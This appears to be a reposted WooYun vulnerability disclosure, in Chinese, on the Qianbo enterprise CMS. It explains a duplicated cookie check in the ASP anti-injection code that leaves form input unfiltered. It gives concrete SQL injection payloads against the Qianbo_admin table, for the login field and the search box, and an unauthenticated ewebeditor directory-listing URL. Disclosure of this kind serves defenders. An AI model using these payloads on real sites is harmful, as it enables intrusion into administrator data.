来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 千博企业站程序,防注入语句里有一个小白错误!详细说明:If EnableStopInjection = True ThenIf Request.QueryString Then Call StopInjection(Request.QueryString)If Request.Cookies ......
千博企业站程序,防注入语句里有一个小白错误!
详细说明:If EnableStopInjection = True Then If Request.QueryString <> "" Then Call StopInjection(Request.QueryString) If Request.Cookies <> "" Then Call StopInjection(Request.Cookies) If Request.Cookies <> "" Then Call StopInjection2(Request.Form) End If ======================== 防注入开始还是Encode的,通过Echo他们的解码程序,才发现,这里面把cookie是否空判断两次。造成了Form的恶意字符提交。 漏洞证明:一个鸡肋的前台用户登陆Md5值是1,语句写在用户名里,密码写1 ' UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where ''=' 这个鸡肋的前台登陆只能到达MemberLogin.asp的48行 If UCase(LoginName) = UCase(MemName) And LoginPassword = Password LoginName取的就是刚刚的那串语句,而查询结果的用户名是1所以卡在了这里 ================================================================= http://www.2cto.com /system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE 后台ewebeditor没有做权限的验证,可导致游客直接浏览 FCK也可列目录用本地的Test连上他们的Fck =================================================================== 搜索框中输入 %' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'=' ================================================================== 一堆鸡肋啊。。 修复方案: 各种修复啊,你们都懂的!!! 作者 B1uH4ck@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com